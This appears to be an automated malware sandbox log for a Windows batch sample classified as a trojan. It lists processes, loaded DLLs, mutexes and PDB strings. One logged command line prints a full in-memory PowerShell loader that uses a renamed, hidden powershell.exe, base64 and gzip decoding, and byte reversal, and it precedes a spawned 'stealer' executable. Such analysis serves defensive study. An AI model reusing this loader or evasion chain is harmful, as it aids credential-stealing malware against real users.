Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.troj.evad.winCMD@20/4@3/3
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:64:WilError_03
Source: C:\Users\user\Desktop\849128312.cmd.Fjz File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xryabt.rdz.ps1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\chcp.com Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\849128312.cmd.Fjz File read: C:\Users\user\Desktop\849128312.cmd
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\849128312.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' | Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() | Out-Null"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1144
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: atl.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: version.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: wldp.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: amsi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: userenv.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: profapi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: msisip.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: wshext.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: appxsip.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: opcservices.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: secur32.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: rasman.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: schannel.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: propsys.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: edputil.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: netutils.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: slc.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: sppc.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\849128312.cmd.Fjz File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
